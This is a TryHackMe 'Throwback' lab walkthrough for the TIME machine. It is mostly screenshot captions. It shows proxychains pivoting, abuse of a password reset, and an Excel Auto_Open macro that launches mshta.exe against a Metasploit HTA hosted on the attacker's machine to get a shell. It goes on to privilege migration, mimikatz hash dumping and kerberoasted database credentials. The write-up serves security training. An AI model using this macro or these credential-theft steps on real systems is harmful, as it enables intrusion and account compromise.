2.8 KiB
TryHackMe-THROWBACK-TIME(100.20.34.176)
Since we ran socks4 proxy on port 1080 we use nmap along with proxychains to see if we can hit a port on TIME machine
![](https://imgur.com/Oua6jV6.png)
So we can access the web page
![](https://imgur.com/Ap23uHS.png)
Going back to MAIL machine to get reset link by logging in as MurhphyF
![](https://imgur.com/ct7QiLo.png)
![](https://imgur.com/C2GtwAZ.png)
murphyf PASSWORD
Now we need to update our /etc/hosts
file
![](https://imgur.com/PoMKmTj.png)
We updated the password through the reset link and can login with those
![](https://imgur.com/bqC9YLA.png)
Create a microsoft execl macro document having this macro in it using metasploit hta server
![](https://imgur.com/Dc9SkJn.png)
Sub HelloWorld()
PID = Shell("mshta.exe http://10.50.31.16:8000/j4KCBrR.hta")
End Sub
Sub Auto_Open()
HelloWorld
End Sub
Where that .hta is generated through metasploit
![](https://imgur.com/hH3CtYv.png)
Upload that document
![](https://imgur.com/wMsI47W.png)
You will get a shell
![](https://imgur.com/rPVhUeX.png)
![](https://imgur.com/c50uP96.png)
By typing sysinfo
![](https://imgur.com/f8zyeGj.png)
We can see that we are on a 64 bit windows architecture but on 32 bit merterpreter session so we need to migrate to a 64 bit process. Running command ps
to check currently running processes
![](https://imgur.com/bdOCw2v.png)
Here we need to identify the process which is running as NT AUTHORITY\SYSTEM
also running as a 64 bit
![](https://imgur.com/463bpoZ.png)
So we see this statisfying our requirements
![](https://imgur.com/4hK07Bz.png)
And now we are the highest privileged user also now our meterpeter session is on 64 bit architecture
![](https://imgur.com/E32Xkih.png)
We can now run commands like mimikatz , hashdump
![](https://imgur.com/QbbtiWT.png)
We have successfully dumped the hashes of the accounts on this machine
![](https://imgur.com/VeUFkA8.png)
Using proxychains we ssh with Timekeeper's
credentials
![](https://imgur.com/1nIqZ4k.png)
Switch to directory where mysql.exe is
![](https://imgur.com/U4SGngW.png)
Using the password from the kerberoasted mysql service account
![](https://i.imgur.com/rmE7npi.png)
![](https://imgur.com/4XA3GzU.png)
![](https://imgur.com/txG4w4O.png)
![](https://imgur.com/xzlIeYn.png)
![](https://imgur.com/bQ29SjC.png)
Save the list of usernames you found from domain_users
database
![](https://imgur.com/h5Eomzj.png)
We can utilize the same list of passwords we used to get access to Throwbacks mail
![](https://imgur.com/oEVEw8H.png)
![](https://imgur.com/TctWVPF.png)